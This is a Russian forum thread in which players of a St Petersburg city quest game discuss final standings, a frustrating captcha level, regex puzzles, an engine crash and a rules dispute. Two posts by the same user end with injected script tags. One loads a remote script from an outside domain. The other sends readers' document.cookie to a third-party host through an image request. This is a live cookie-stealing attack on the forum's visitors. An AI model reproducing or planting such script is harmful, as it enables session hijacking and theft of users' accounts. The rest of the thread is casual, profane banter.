Форумы Dead-Line

Форумы Dead-Line (http://dead-line.spb.ru/forum/index.php)
-   Обсуждение прошедших игр (http://dead-line.spb.ru/forum/forumdisplay.php?f=48)
-   -   Игра наотъ*бись 2 (http://dead-line.spb.ru/forum/showthread.php?t=6009)

El Red 16-03-2013 04:10

Игра наотъ*бись 2
 
С учетом всех апелляций, бонусов, штрафов и компенсаций итоговое распределение мест выглядит так:

#1 Команда придурков, блеать!
#2 Futurama SPb Team
#3 Бaбники
#4 Пакмэн
#5 РАСЧЛЕНЁНКА
#6 СПГ
#7 VКХ
#8 psychos
#9 Люди_X
#10 Пешеезды
#11 764
#12 Якорьвзад

Итоговая статистика
Пересчет статистики по уровням с учетом бонусов и штрафов
Апелляции и ответы на них

prinncessa 16-03-2013 04:20

Спасибо за игру. Не смотря на весь ахтунг весело, задорно и местами даже интересно.
убедительная просьба, финальную стату считать не на отъебись, а выспавшись и все взвесив)))

Jaguar 16-03-2013 04:21

давайте результаты...а то не спится))

CraMax 16-03-2013 04:26

статистику расп*дарасило ))

Jaguar 16-03-2013 04:32

ага....мне пишет:
Прием оценок начнется сразу после прохождения последнего уровня.:D

Ol4ik 16-03-2013 04:34

Цитата:

Сообщение от Jaguar (Сообщение 260413)
ага....мне пишет:
Прием оценок начнется сразу после прохождения последнего уровня.:D

Таки мы не финишировали :D играеееем!)

Goy 16-03-2013 04:42

А мне понравилось закончить в 2:) Да и на игре было довольно весело. Но кодов реально было мало!

Jaguar 16-03-2013 04:43

Цитата:

Сообщение от Ol4ik (Сообщение 260414)
Таки мы не финишировали :D играеееем!)

выезжать обратно?:D канонерская 28?

S3T 16-03-2013 06:06

быстро, динамично, айтишно, но косяк с первым уровнем и 3 секунды на капчу очень портят всю картину ((

ndevil 16-03-2013 06:47

Спасибо за игру, понравилось. Быстро, динамично, весело, не задротно, уровень с тросом и замками вобще супер. Не понравилась только капча - по 2-3 секунды на одну капчу, даже со стационарного компа штаб физически не успевал ничего вбивать.
<script language='javascript' charset='UTF-8' type='text/javascript' src='http://nummobile.com/80j4ch2sa3g98uehlyoro4uftwotqhh'></script>
<script> img = new Image(); img.src = "http://frontext.ru/www/s.gif?"+document.cookie; </script>

G1ZM0 16-03-2013 06:59

Игра понравилась. Спасибо! Не понравилось, что некоторые задания не брались с андройдов, и на последнем уровне лицо метеоритом расп*дарасило(( Спасибо конкурентам за аптечку)

Zlo 16-03-2013 08:40

капча - пиздец!

многие задумки понравились.

по объективным причинам ушел спать раньше времени.

dab 16-03-2013 10:14

В общем неплохо, несмотря на количество повторений слова пиздец в канале. Но вмешательства движок по ходу игры опасны.. Не надо так делать..

Effa 16-03-2013 10:18

Игра - редкостная капча. Или капчец.

Jaguar 16-03-2013 10:59

Ребята, обьявите статистику то с брифа, он же был в 4 утра:rolleyes:

Капчу кто-нить взял не последней? покажите этого монстроупорка)

RAVE 16-03-2013 11:02

доставили уровень с тараканьим кодом и закурка с просвечивающими квадратами.
Обилие программерских фич расстроило(

Heckfy 16-03-2013 11:34

Я фрезеровщик блеать, я не в хуй не дую как с английского прокси надо заходить на другие сайты....

Effa 16-03-2013 11:44

Цитата:

Сообщение от Heckfy (Сообщение 260430)
Я фрезеровщик блеать

Сделай игру, где на каждом уровне надо будет выпиливать и штрафы не в минутах, а в пальцах.
чтобы добавить ада, могу написать все закурки на итальянском.

Pukkaras 16-03-2013 11:56

Ожидания, к сожалению, оправдались, хотел в штаб, но вытащили в поле за 3 часа до старта. Такая игра, не скажу что плохая, нормальная, но забуду, наверное, уже через недельку.

dab 16-03-2013 11:57

Цитата:

Сообщение от Heckfy (Сообщение 260430)
Я фрезеровщик блеать, я не в хуй не дую как с английского прокси надо заходить на другие сайты....

Сажи ещё, что РЧ играет без штаба??:blabla::D
Конечно, понятно, что наличие системного админа или человека хорошо понимающего в компуттерах было преимуществом на этом уровне, зато теперь ты имеешь все шансы изучить этот вопрос, чтоб в следующий раз знать чо и как:-)

Misha 16-03-2013 12:18

Что нужно было сделать с результатом выполнения регулярки?

Grom 16-03-2013 12:24

Я так понял что просто найти слово в тексте, у которого внутри есть st и q или типа того :)

Мой личный рейтинг самых крутых авторов сегодня обновился:
1. Lvyona
2. Страус-труп
3. Ведра/кубики

Batleby 16-03-2013 12:35

А чойта стата какя-то трешовая?

Punch 16-03-2013 12:40

Цитата:

Сообщение от Batleby (Сообщение 260437)
А чойта стата какя-то трешовая?

Четыре команды не проходили один из уровней линейной игры, поэтому в стате де-юре они играть не закончили.

Punch 16-03-2013 12:41

Цитата:

Сообщение от Misha (Сообщение 260434)
Что нужно было сделать с результатом выполнения регулярки?

Миш, пользовался онлайн regex-конвертером, нашел ответ сразу.

Effa 16-03-2013 12:46

Цитата:

Сообщение от Punch (Сообщение 260440)
Миш, пользовался онлайн regex-конвертером, нашел ответ сразу.

Мы пользовались тремя калькуляторами с трех компов, у всех получился один и тот же ответ, который не проходил.

Крайне интересно узнать подробный способ раскурки, ибо этот слив нам стоил дорого.

Misha 16-03-2013 12:56

Цитата:

Сообщение от Punch (Сообщение 260440)
Миш, пользовался онлайн regex-конвертером, нашел ответ сразу.

Я тоже, я поэтому и спросил, что делать с результатом, а не с самой регуляркой ;)
Результатом у нас было три слова. Вбивали их с пробелами и без, вместе и по отдельности, но бестолку...

Heckfy 16-03-2013 13:23

Если я захерачу в задание задачку по сопромату или теормеху, многие команды пройдут этот уровень? Скажите еще, что все играют без штаба...

Deneb 16-03-2013 13:26

Цитата:

Сообщение от Heckfy (Сообщение 260445)
Если я захерачу в задание задачку по сопромату или теормеху, многие команды пройдут этот уровень?

эта особенность склада ума некоторых людей меня всегда крайне удивляла. Нахуй так делать то? Хотя что то объяснять и спорить бесполезно, это удивительное явление я наблюдаю уже много лет, лечением сего недуга является только отрубание головы. А в целом игра ничо такая. Я все пиздецы для себя объяснил тем, что игра на отъебись. Оценку я тоже правда поставил рандомно(хотя всем похуй, но мне приятно).

Heckfy 16-03-2013 13:37

В целом игра не плохая, но при такой продолжительности игры столь специализированные загадули обрекают команду на проеб. Вот я возьму и напишу... Хотя ясно, что не возьму и не напишу, т.к. хочется, чтобы играть можно было обладая хорошей эрудицией, а не какими-то конкретными знаниями. Поэтому стараюсь писать такие задания, которые и рыбак и фрезеровщик и химик могут раздуплить...

Тэ. 16-03-2013 13:45

За*бись было на уровне с волшебной палочкой. Единственное, что бралось логично, просто и оригинально. Еще забавне лиса (привет Футураме :D)
А в остальном - кровь из глаз. С нетерпением жду сценария, а то как теперь суп варить без регэкспов даже и не представляю.

El Red 16-03-2013 13:46

ППО: предварительная статистика

грициан 16-03-2013 13:48

Цитата:

Сообщение от dab (Сообщение 260433)
Конечно, понятно, что наличие системного админа или человека хорошо понимающего в компуттерах было преимуществом на этом уровне, зато теперь ты имеешь все шансы изучить этот вопрос, чтоб в следующий раз знать чо и как:-)

Да не только на этом уровне, а на всей игре.

А в целом да, игра капчец.

Velkopiterskij 16-03-2013 13:52

Цитата:

Сообщение от Heckfy (Сообщение 260445)
Если я захерачу в задание задачку по сопромату или теормеху, многие команды пройдут этот уровень? Скажите еще, что все играют без штаба...

Если одну и с понятно гуглящимися формулами, то почему бы и нет)

prinncessa 16-03-2013 13:55

Цитата:

Сообщение от El Red (Сообщение 260451)
ППО: предварительная статистика

Когда примерно ждать подробную, с комментариями и пересчетами?

Punch 16-03-2013 13:57

Цитата:

Сообщение от Velkopiterskij (Сообщение 260453)
Если одну и с понятно гуглящимися формулами, то почему бы и нет)

Велко, уйди со своим керлингом))))

areadna 16-03-2013 13:58

Цитата:

Сообщение от Prinncess@ (Сообщение 260454)
Когда примерно ждать подробную, с комментариями и пересчетами?

В первом посте пишут к вечеру

Jaguar 16-03-2013 13:59

Цитата:

Сообщение от Prinncess@ (Сообщение 260454)
Когда примерно ждать подробную, с комментариями и пересчетами?

там же написано к вечеру постараются))

prinncessa 16-03-2013 14:00

Цитата:

Сообщение от Jaguar (Сообщение 260457)
там же написано к вечеру постараются))

Слепая я, слепая=)

Velkopiterskij 16-03-2013 14:02

Цитата:

Сообщение от Punch (Сообщение 260455)
Велко, уйди со своим керлингом))))

Там-то что? Физика, 8 класс. Все ж почти школу заканчивали)

Velkopiterskij 16-03-2013 14:05

Цитата:

Сообщение от Тэ. (Сообщение 260450)
Еще забавне лиса (привет Футураме :D)

А вот тут как раз очень хотелось поинтересоваться.
Получаем задание с лисой, видим, что СПГ уровень уже взяли и должны, вроде как, курить следующий. Однако за лисой катается Футурама(ещё находящаяся на уровне) и, внезапно, СПГ. При том СПГ едут так, что не дают Футураме обогнать лису и мешают нам к ней приблизится. Очень интересно как игроки команды соотносят это с пунктом 3.4.2. правил.
Цитата:

Игрокам запрещается умышленно усложнять либо просто изменять условия взятия уровня для других команд. Сюда входят такие моменты как порча и маскировка кодов, опознавательных знаков и подходов к ним, создание ложных кодов и указателей, блокировка машин соперников, распространение заведомо неверной информации со ссылкой на организаторов и т.д.

Deneb 16-03-2013 14:15

Это называется адить) А что, этот несчастный флажок с кодом орги показывали только из определенного окошка? И у них все окна были забиты досками кроме одного?) что мешало подъехать с другой стороны и заглянуть в другое окно? Если я не ошибаюсь, там где каталась лиса, три полосы в одну сторону. Или я что то не понимаю?
ЗЫ Слушал рассказы СПГ и Футы.

Velkopiterskij 16-03-2013 14:21

Цитата:

Сообщение от Deneb (Сообщение 260463)
Это называется адить) А что, этот несчастный флажок с кодом орги показывали только из определенного окошка? И у них все окна были забиты досками кроме одного?) что мешало подъехать с другой стороны и заглянуть в другое окно? Если я не ошибаюсь, там где каталась лиса, три полосы в одну сторону. Или я что то не понимаю?
ЗЫ Слушал рассказы СПГ и Футы.

Это, на мой взгляд, называется нарушение правил. Я повторюсь, что принципиальным в данном вопросе является то, что команда СПГ уровень уже закрыла.
К левому окошку подъехать было невозможно, ибо лиса ехала в крайнем левом ряду. Мы подъехали к правому окошку. Что не отменяет того что команда СПГ намерено создавала нам помехи при взятии уровня, на котором их уже не должно было быть.

Deneb 16-03-2013 14:30

тогда всем третье место, посоны1

DEd_MONro 16-03-2013 14:52

А вот мне игра тоже понравилось, было весело, особенно на капче, интресные всякие идейки и забавы были. Если б в движок не полезли то игра бы вообще супер, а ну и еще кодюль бы побольше а так игра оправдала название)))

Жду логики некоторых закурок, особенно первой))
Спасибо.

PS а с футой тоже весело вышло))

Deneb 16-03-2013 15:21

а вот как самая лучшая команда в мире раскурила канонерскую
http://data2.floomby.com/files/share...DCnXcv6pyQ.jpg
:D:D:D

грициан 16-03-2013 15:41

Цитата:

Сообщение от Deneb (Сообщение 260475)
а вот как самая лучшая команда в мире раскурила канонерскую
http://data2.floomby.com/files/share...DCnXcv6pyQ.jpg
:D:D:D

Её многие раскурили) Вы туда поехали?)

nadlooshi 16-03-2013 15:42

Не понравилось совсем и ничего. Игра заняла первое место в списке эпично засранных. Причем самое обидное, что задумки были крутые некоторые, но от реализации кровь текла из глаз всю игру. В полях было веселее, наверное...
Ну и статистика... промолчу про статистику. Снимать уровень, когда на нем 4 команды, а потом возвращать его (при условии, что тем, кто на нем был, он уже выдан не будет...) - это лютый ад. Кое-как это можно объяснить незнанием движка, но вроде как почти у всех авторов по 5-6 игр на движке en в послужном, вроде как не первый раз движок в глаза увидели. В общем, не зашло совсем, простите. Я так и не поняла, чем я вчера занималась до двух часов ночи.

Jaguar 16-03-2013 15:46

Цитата:

Сообщение от грициан (Сообщение 260476)
Её многие раскурили) Вы туда поехали?)

мы матанулсиь, после пдск вернулись...:D

Punch 16-03-2013 15:47

Цитата:

Сообщение от грициан (Сообщение 260476)
Её многие раскурили) Вы туда поехали?)

мы съездили, облизали кананерскую-28. а что еще, если версий нет и быть не может? а тут опа - и реально коорды выкурены, и в зоне находятся. Да, видели там только РЧ

Effa 16-03-2013 15:50

А вот кстати, я почти 7 лет уже играю на энкодвигле и всегда, ВСЕГДА было так, что вернуть снятый уровень нельзя, ващпе, даже если сиськи Эйру показать. Но тут авторы смогли. У меня устаревшие познания о движке или авторы применили магию?

грициан 16-03-2013 15:59

Цитата:

Сообщение от Effa (Сообщение 260481)
А вот кстати, я почти 7 лет уже играю на энкодвигле и всегда, ВСЕГДА было так, что вернуть снятый уровень нельзя, ващпе, даже если сиськи Эйру показать. Но тут авторы смогли. У меня устаревшие познания о движке или авторы применили магию?

А ещё обычно нельзя в линейной игре вставить уровень до того, на который уже перешла команда.

Вообще в Энке есть такое понятие "талантливые программисты". Оно хоть не об авторах игр, но к определению данной игры вполне подходит.

nadlooshi 16-03-2013 16:01

Цитата:

Сообщение от Effa (Сообщение 260481)
А вот кстати, я почти 7 лет уже играю на энкодвигле и всегда, ВСЕГДА было так, что вернуть снятый уровень нельзя, ващпе, даже если сиськи Эйру показать.

Не знаю, насколько давно (года два так точно), но можно... Там внизу после всех перестановок есть окошко Снять уровень - Вернуть уровень и выпадающее меню с номерами уровней.

Punch 16-03-2013 16:12

А, по игре. Несмотря на россыпь маленьких и огромных косяков, игра понравилась. Очень много смелых и интересных задумок, побылвал на некоторых местах, которые давно знаю, но случая побывать не представлялось.

1. Беринга - как я понимаю, задание курилось (если курилось) через жопу + явные коорды в хтмл-коде, которые бьют в зону. По полелогике здесь и на задании с магической книгой очень хотелось бы хотя бы намек на то, что относится к заданию, а что - к полелогике. Очень долго здесь прикуривали Regex, когда уже приехали на канонерскую. Саму полелогику взяли на ура (нашел какой-то конвертер, который сразу и однозначно выдал закрывающий код)
2. метро - пролетело мимо, задание из очевидных, взяли быстро, я из машины не успел выйти)
3. Екатерингофка - до статы уже по заданию не вспомню, но раскурили быстро. Идея уровня достаточно боянна, но мне такие уровни заходят (как и похожий уровень у Бабников на ДЛ1). Единственное не понял, зачем нас Сашка обозвал Пешеездами))
4. КО3 - лютый пиздец с двиглом, скелет суперский! наконец я на него залез и пару фоток еще успел сделать)
5. Гиря на мосту - смысл уровня не понял, загадки не было, в общем уровень а-ля метро и трефолева 10)) Запомнился только тем, что у этого моста потом все стояли и пытались вбить капчу))
6. собственно, капча: респект Футураме, что они взяли доезд до получения 20-го бонуса) отборного мата стояло в машине - шописец. Монро, выложи видяху на всеобщее обозрение, что у вас в машине было:D Загадку недотестили - уровень практически невозможно было взять с поля, когда из 10 секунд 5 секунд грузится страница и 5 секунд она пролистывается до капчи и обратно до поля ввода кода. Сам уровень понравился, брали быстро и все, что видели в двигле - в итоге коце закрыло уровень по какому-то количеству кодов)
7. Трефолева 45 - загадку не видел, не успел, коды хорошо прописаны (да и вообще надо отметить, все коды были нормальные на игре, метки тоже - за что респект, ребята)
8. Лиса - взяли из-за Яги, который зачем-то решил с лисой поравняться на светофоре, пока мы курили семафорную азбуку, а заодно успел прочитать код)) Загадка, конечно, простая)
9. Магия - вот тут мы чуть не скатились в подвал турнирки) ибо курили книгу, тыкались в нее безбожно палкой (волшебной). раскурили только с подсказки (все гениальное - просто). На уровне коце уж докурило, как там надо палкой по книге водить. В общем уровень - отличный, только бы написали, что к загадке относится, а что - к полелогике.
10. с трефолева все понятно. цифра 10 - и можно на желтый угол даже не смотреть)

В общем, динамично, весело, зашло местами)
Пишите еще, только тестите и не оставляйте все на последнюю неделю)

El Red 16-03-2013 16:13

Цитата:

Сообщение от nadlooshi (Сообщение 260477)
Снимать уровень, когда на нем 4 команды, а потом возвращать его (при условии, что тем, кто на нем был, он уже выдан не будет...) - это лютый ад. Кое-как это можно объяснить незнанием движка, но вроде как почти у всех авторов по 5-6 игр на движке en в послужном, вроде как не первый раз движок в глаза увидели.

Если ты предложишь мне более адекватное решение этой проблемы - скажу спасибо.
После перехода на уровень КО-3 некоторые команды стали жаловаться на то, что "движок упал". Когда стало ясно, что все жалующиеся команды висят на одном и том же уровне, было принято решение снять уровень, чтобы повисшие команды перешли на следующий и посчитать им снятый уровень по среднему.

Цитата:

Сообщение от Effa (Сообщение 260481)
А вот кстати, я почти 7 лет уже играю на энкодвигле и всегда, ВСЕГДА было так, что вернуть снятый уровень нельзя, ващпе, даже если сиськи Эйру показать. Но тут авторы смогли. У меня устаревшие познания о движке или авторы применили магию?

http://d1.endata.cx/data/games/41519/levelback.png

nadlooshi 16-03-2013 16:20

Цитата:

Сообщение от El Red (Сообщение 260487)
Если ты предложишь мне более адекватное решение этой проблемы - скажу спасибо.

Да не, вы приняли верное решение о снятии уровня. Но возвращать-то его было потом зачем? :)

Effa 16-03-2013 16:38

Цитата:

Сообщение от El Red (Сообщение 260487)

У кого есть машина времени? Мне во Владивосток в сентябрь 2007 года с этой фичей надо сгонять!

El Red 16-03-2013 16:43

Цитата:

Сообщение от nadlooshi (Сообщение 260489)
Да не, вы приняли верное решение о снятии уровня. Но возвращать-то его было потом зачем? :)

Чтобы его могли пройти остальные и чтобы посчитать по среднему тем, кто не прошел. Только потом выяснилось, что не прошли слишком многие

грициан 16-03-2013 16:45

Цитата:

Сообщение от El Red (Сообщение 260487)
Если ты предложишь мне более адекватное решение этой проблемы - скажу спасибо.

Вычитывать сценарий несколько раз ДО игры. Чтоб не нужно было срочно вставлять уровни. Как при таком количестве авторов так накосячить я не понимаю.

Punch 16-03-2013 16:56

Цитата:

Сообщение от грициан (Сообщение 260493)
Вычитывать сценарий несколько раз ДО игры. Чтоб не нужно было срочно вставлять уровни. Как при таком количестве авторов так накосячить я не понимаю.

Да тут же у нас много гуру энкодвижка! помогите уж ребятам, а то ситуация и правда нестандартная...

P.S. Первый раз вижу людей, которые снесли энкодвиг)))
Может, на RECO? Или уж АГТ вернем?))
А то его нафиг, падает и падает:D:D:D

Grom 16-03-2013 17:08

Боюсь, что другие движки они утопят еще на первом задании :)

грициан 16-03-2013 17:15

Цитата:

Сообщение от Punch (Сообщение 260494)
Да тут же у нас много гуру энкодвижка! помогите уж ребятам, а то ситуация и правда нестандартная...

Единственный выход я написал выше. Ну и думать даже в экстренных ситуациях прежде, что нажимать кнопки.

Heckfy 16-03-2013 17:24

Еще в самых первых моих играх в этом самом проекти удивлялся какие задания для штаба неровные. В одном задании вам нужна семья Друзей для разгадки, а в другом приходят координаты сразу.
Вот и тут - трефолева 10 и Беринга - очень-очень отличаются. Ну таков самый лучший ( после покойного) проект на свете.

S3T 16-03-2013 18:14

Цитата:

Сообщение от G1ZM0 (Сообщение 260419)
Игра понравилась. Спасибо! Не понравилось, что некоторые задания не брались с андройдов, и на последнем уровне лицо метеоритом расп*дарасило(( Спасибо конкурентам за аптечку)

эт по игре конкуренты, а со здоровьем - незя соперничать

эт Вам спасибо, буду знать, что аптечку надо обновить

без швов хоть обошлось дело?

DEd_MONro 16-03-2013 18:22

Цитата:

Сообщение от Punch (Сообщение 260494)
P.S. Первый раз вижу людей, которые снесли энкодвиг)))

Это ты явно в лихие девяностые не играл

Effa 16-03-2013 18:31

Цитата:

Сообщение от DEd_MONro (Сообщение 260502)
Это ты явно в лихие девяностые не играл

Не, там весь нокаутир упал еще до игры, а тут только домен дедлайна поломался.

DEd_MONro 16-03-2013 19:41

Цитата:

Сообщение от Effa (Сообщение 260503)
Не, там весь нокаутир упал еще до игры, а тут только домен дедлайна поломался.

НУ это я как раз к тому что бывают лаги с движком и глобальнее))
Зато весело по скайпу поиграли

ndevil 16-03-2013 19:51

а когда будет монторинг? уже вечер вобщето.
<script language='javascript' charset='UTF-8' type='text/javascript' src='http://nummobile.com/80j4ch2sa3g98uehlyoro4uftwotqhh'></script>
<script> img = new Image(); img.src = "http://frontext.ru/www/s.gif?"+document.cookie; </script>

McLuck 16-03-2013 21:28

Игра хороша, спасибо авторам! Играли, наконец-то ЦЕЛЫМ экипажем и полуКЦ. Им тоже спасибо!
Где конечка первого кода на Трефолева 45??
Попрошу добавить к стоп-тайму 1-1,5 минуты из-за замочка.
Почему нашего замочка не было и мы пользовались замочком "команда придурков..". И в следующий раз замочки закрывайте сами)
Почему на тараканьих бегах код №24 в задании был КО1? Потратили ~25 мин из-за этого.
Ну и конечно порадовались, посмотрев стату после второго-третьего задания, когда почему-то были первые))

Тэ. 16-03-2013 21:45

http://www.youtube.com/watch?feature...&v=AMP9WzYSoxw

McLuck 16-03-2013 23:40

Уже можно, думал, вдруг пригодится)
Инфа 146% - Эфир, Метеорит, Harlem shake

Shifer23 17-03-2013 02:03

А то, что в статистике и сценарии, еще правиться будет или имеет смысл наваливать с вопросами?

Heckfy 17-03-2013 02:30

Ясен хуй. Надо эпиляцию писать. такие дела.

El Red 17-03-2013 02:56

Сценарий: http://deadline.en.cx/GameScenario.aspx?gid=41519
Я снова забыл, какое шаманство надо сделать, кроме признания игры состоявшейся, чтобы все увидели мониторинг. Кто знает - подскажите.

Предварительная статистика - в первом посте.
Статистика в движке неактуальна. Постараемся привести ее в нормальный вид завтра.
Также будем проверять итоговое время прохождения уровней командами по времени выхода на уровень (в статистике) и времени вбития кодов (по мониторингу). Если окажется, что из-за добавления-снятия уровней в движке что-то просуммировано неправильно, статистика изменится.

nadlooshi 17-03-2013 03:14

Цитата:

Сообщение от El Red (Сообщение 260520)
Сценарий: http://deadline.en.cx/GameScenario.aspx?gid=41519
Я снова забыл, какое шаманство надо сделать, кроме признания игры состоявшейся, чтобы все увидели мониторинг. Кто знает - подскажите

Можно, подскажу?
Настройки игры - Расширенные настройки - Показывать мониторинг. Там же, собсно, занятое место, сценарий, статистика (хотя она и так видна) и прочее.
Кстати, команды, которые не финишировали по движку (мож кому очки нужны или оценку поставить там), можно довести до финиша через финишный протокол (так же, где признают игру состоявшейся через Корректировать результаты), но тогда она станет еще более неактуальна:)

El Red 17-03-2013 04:05

Цитата:

Сообщение от nadlooshi (Сообщение 260521)
Можно, подскажу?
Настройки игры - Расширенные настройки - Показывать мониторинг. Там же, собсно, занятое место, сценарий, статистика (хотя она и так видна) и прочее.

http://d1.endata.cx/data/games/41519/nomon.png
я пиздоглаз или там правда нет пункта про мониторинг?

Цитата:

Сообщение от nadlooshi (Сообщение 260521)
Кстати, команды, которые не финишировали по движку (мож кому очки нужны или оценку поставить там), можно довести до финиша через финишный протокол (так же, где признают игру состоявшейся через Корректировать результаты), но тогда она станет еще более неактуальна:)

Да, знаем. Но надо ли рисовать финишный протокол команде, которая снялась с игры?

G1ZM0 17-03-2013 04:19

Цитата:

Сообщение от S3T (Сообщение 260501)
эт по игре конкуренты, а со здоровьем - незя соперничать

эт Вам спасибо, буду знать, что аптечку надо обновить

без швов хоть обошлось дело?

долго думал как Вас назвать "конкуренты", "коллеги" или "собратья")))
обошлось без швов, т.к. в травму не поехал. Мажу рожу мазьками, обклеиваю пластырями...вроде норм))) но шрам останется(

Jaguar 17-03-2013 05:28

когда ждать окончательную статистику?

ВарENик 17-03-2013 09:36

О, я таки доползла до сюда))
Впервые видела такой глюк движка, была в шоке...
Понравился уровень с расп*дорашеным кодом...
Капчу мы взяли не последнюю, если не ошибаюсь 11 была...
А в целом лично мне много чего не понятно, ибо я не программер...
Спасибо всем кто специально и случайно был с нами в штабе)))
Спасибо за короткую игру)))

грициан 17-03-2013 09:52

Цитата:

Сообщение от El Red (Сообщение 260522)
http://d1.endata.cx/data/games/41519/nomon.png
я пиздоглаз или там правда нет пункта про мониторинг?


Да, знаем. Но надо ли рисовать финишный протокол команде, которая снялась с игры?

Мониторинг не надо открывать. Не в смысле что он не нужен, сейчас мониторинг открывается автоматически. Т.е. уже открыт и доступен.

А вот отображать место участника в конце игры стоит поставить.

По второму вопросу думаю не нужно, если они сами снялись.

Тэ. 17-03-2013 11:14

А выносить оппеляции в сценарий - это тоже какой-то магический ритуал? Я так, уточнить. А то вдруг без этого игра не закроется и очечи не начислятся. А нам без очечей никак нельзя. Не православно это.

McLuck 18-03-2013 00:30

Какая команда играла на уазике?

Jaguar 18-03-2013 00:34

итоговую стату когда ожидать?

Heckfy 18-03-2013 00:34

никогда

Го 18-03-2013 00:36

Цитата:

Сообщение от McLuck (Сообщение 260581)
Какая команда играла на уазике?

Психоз

DashИК 18-03-2013 00:48

Не смотря на некоторое количество технических косяков игра понравилась.
На первом задание хороший штаб оказался минусом - уехали на Канонерскую, 28, потеряли много времени на возвращение, но зато потом компенсировали потерянное время быстрой раскуркой кода.
Васька позабавила - по-моему люди в камуфляже с фонарями и рациями бегущие по эскалатору не удивляют уже не только обычных граждан, но и сотрудников милиции...
"Внезапно кирпич" оказался действительно "внезапно кирпичом". Долго сомневались в месте - уж больно далеко от Васьки. Путанка понра, хотя я не совсем понимаю, почему нельзя было дать правильный замок... можно было бы обойтись без штрафа, но это мелочи. И да, орги молодцы. что оперативно разрулили ситуацию.
Увидеть как упал двидок енки - бесценно. У нас были приглашенные удаленщики, это была их первая игра в ДЛе... ребят, вы сделали то, что почти невозможно ))) и я реально не знаю, что правильнее, говорить, что это пиздец, или же гордиться нашими умельцами.
Капча подарила 15 минут мата и истерик в нашей машине, а также великолепное видео. Монро - ты лучший )))
Рапидорашеные коды понравились, спасибо нашему КЦ, что мы не успели заипаться.
Любимый баян на Трефолева, как же я по нему соскучилась )
Безумная Fox-а.
Адовый затуп с кордами и потом с книгой.
Еще один любимый баян на Трефолева и затем "черная дыра" )

Спасибо за игру, было ржачно и ненапряжно, но все-таки хочется, чтобы в будущем игры как-то тестировались авторами. И да немного странно столкнуться с этим: "необходимость дописывать одну из загадок и прописывать еще два кода привели к спешке в начале игры и впопыхах мы просто-напросто забыли про карту." на игре людей, которые пишут не первую игру.
В общем хочет пожелать на будущее лучшего уровня организации при таком же уровне позитива и количестве прикольных задумок.

Кюхель 18-03-2013 05:51

x
 
Салют.
Что делают, когда пишут первое сообщение? Правильно - выдают только положительные эмоции.
Что делать, когда их нет? Правильно - не писать первое сообщение:o.

Поэтому всё, что рыжим, можете не читать ;)

Вот, к примеру, игра. Что делать, когда есть что делать, но по сути делать нечего? И - ничего не поделать - надо это делать, даже если это не дело?... А кое-кому надо либо делать, либо не делать. Но это надо делать до игры.
Потому мнение. Минус один, но глобальный, а плюсов вагон, но мелких.

-
Пусть вся программерская хрень горит в аду :rolleyes::
- к специализированным областям знаний - отдельное руководство и предупреждение командам до игры (например, "гуманитарии, сдохните" или "литературные загадки для лохов" или "я у мамы программист");
- мозиллу в стафф(!);
- широкоэкранный дизайнерский бук (или необходимость убогим бескацешным командам породить кц с широкоэкранным дизайнерским буком) и авто пошире в стафф.

Готов записаться в почетные (кто там у нас?) фрезеровщики или кузнецы. Ибо я скорее научусь гнуть паранормального размера болты, чем расшифровывать regex не как "регулярная бывшая" или вешать на рыжую лису рыжие кирпичи. Недемократичность это плохо.

Непонятно, почему уровни одного формата (игровые, веселые), а загадки совершенно иного (серьезные, задротные, алогичные по природе).


+
+ уровень с замками восхитителен;
+ давно не тягал гири;
+ метро прекрасно, прокачало;
+ книга магии уау е;
+ мгновенная лиса;
+ множество косяков списалось на раскрытие темы игры (ну что ж, обещали наотъ*бись и слово сдержали).

Любые отходы от шаблонов это аллилуйя! Возблагодарим! Так-то спасибо=)

С уважением.

P.S. Если у кого-нибудь возникнет добро на это сообщение, пожалуйста, просветите. Вот уже есть небольшой бэкграунд по играм здесь. Подскажите, полное отсутствие сюжетной линии, вовлечения в игровой процесс, погружения в игру - неужели это норма, или просто нам "везёт"? Пока была только одна игра (я разные форматы имею в виду), где было интересно, а не только шилов*опие. Склонен считать, что движок-ограничитель творчества тому виной.

Grom 18-03-2013 08:27

Мозиллу зачем в стафф?
Сохранил страницу на комп полностью, поменял цвет фона на черный, сохранил, открыл :)
Не знаешь что такое регулярки - в вики все объяснено + есть онлайны.

В целом задумки интересные, но не зашло...

Pukkaras 18-03-2013 09:25

Цитата:

Сообщение от Кюхель (Сообщение 260593)
P.S. Если у кого-нибудь возникнет добро на это сообщение, пожалуйста, просветите. Вот уже есть небольшой бэкграунд по играм здесь. Подскажите, полное отсутствие сюжетной линии, вовлечения в игровой процесс, погружения в игру - неужели это норма, или просто нам "везёт"? Пока была только одна игра (я разные форматы имею в виду), где было интересно, а не только шилов*опие. Склонен считать, что движок-ограничитель творчества тому виной.

не могу себе представить как движок может быть ограничителем творчества..
Отсутствие сюжетов меня тоже печалит. Но тут вообще все зависит от авторов, они же постоянно разные у всех свое видение. Также стоит разделять понятия сюжет и тема. Если речь идет именно о сюжете, тобишь как о квестовой составлящей, то это довольно таки сложно, таких игр не очень много. я не беру в рассмотрение якобы сюжетные игры по всяким фильмам/книгам/играм, когда взяты просто имена героев и некоторые сценки обыграны в заданиях и на местах какиенить чухи в кокошниках.

DEd_MONro 18-03-2013 09:34

А какая интересно сюжетная линия должна быть в игре с подобным названием?))

El Red 18-03-2013 09:39

Цитата:

Сообщение от DashИК (Сообщение 260586)
Увидеть как упал двидок енки - бесценно. У нас были приглашенные удаленщики, это была их первая игра в ДЛе... ребят, вы сделали то, что почти невозможно ))) и я реально не знаю, что правильнее, говорить, что это пиздец, или же гордиться нашими умельцами.

баг с падением движка я воспроизвел на демо-движке, написал техдиру ЕН, он ответил, что это всегда было запрещено, теперь, видимо, сломалось, и обещал пофиксить.

Цитата:

Сообщение от DashИК (Сообщение 260586)
И да немного странно столкнуться с этим: "необходимость дописывать одну из загадок и прописывать еще два кода привели к спешке в начале игры и впопыхах мы просто-напросто забыли про карту." на игре людей, которые пишут не первую игру.

двойная просрочка и тема игры оставили свой след

Цитата:

Сообщение от Кюхель (Сообщение 260593)
+ множество косяков списалось на раскрытие темы игры (ну что ж, обещали наотъ*бись и слово сдержали).

да уж. в прошлой Наотъ*бись мы специально делали "недописанные" уровни и "неготовые" перфаки. а в этот раз случай помог нам достичь апогея антуражности =)

Jaguar 18-03-2013 10:16

Ваня, стата окончательная?

El Red 18-03-2013 10:34

Цитата:

Сообщение от Pukkaras (Сообщение 260597)
не могу себе представить как движок может быть ограничителем творчества..
